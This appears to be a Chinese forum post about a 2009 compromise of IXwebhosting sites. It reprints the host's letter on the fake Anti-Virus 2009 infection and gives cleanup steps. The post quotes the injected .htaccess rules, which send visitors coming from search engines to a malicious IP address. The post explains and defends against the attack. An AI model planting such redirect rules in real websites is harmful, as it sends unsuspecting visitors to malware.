关于IXwebhosting上出现的安全问题

关于IXwebhosting上出现的安全问题

症状:
直接进入网站没有问题。从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html

原因: 网站的.htaccess文件被修改。会加入如下代码:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

上面的代码就是判断访问者来源。如果是来自上面那些搜索引擎。就自动转向

解决方法:
修正.htaccess。并且去掉.htaccess的写入权限。同时修正根目录的权限。去掉写入权限。

来自IXwebhosting官方的信息。此安全隐患已经得到修正。他们也杀掉了服务器上大部分此类病毒。如果还有问题。请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗。进而被修改网站文件。

下面是ixwebhosting关于此问题发给用户的信件:

In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.

We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.

While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:

1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009

2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.

To illustrate the severity of the issue I would like to share some facts with you:

* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system

We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.

If you have questions regarding any of this information, please contact our support team anytime.

Kind Regards,

Fatima Said, CCO
IX Web Hosting

[贴子地址]:http://bbs.idcspy.com/thread-37171-1-1.html

分享到 :
相关推荐

怎么管理美国服务器(怎么管理美国服务器地址)

管理美国服务器的方法:1。定期对美国服务器数据进行备份;2。及时清理美国服务器共享文...

香港服务器加速的几种常见方式(香港服务器加速的几种常见方式是)

香港服务器加速的几种常见方式。大家都知道。香港服务器具备访问速度快。特性好等优点而深...

如何给服务器加速(如何给服务器加速运行)

给服务器加速的方法:1。将服务器的硬件配置进行升级。改善服务器整体性能;2。将服务器...

搭建vps拨号服务器的价格为什么不同

搭建vps拨号服务器价格不同的原因有:1。服务器CPU。硬盘。内存等硬件配置不同。v...

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注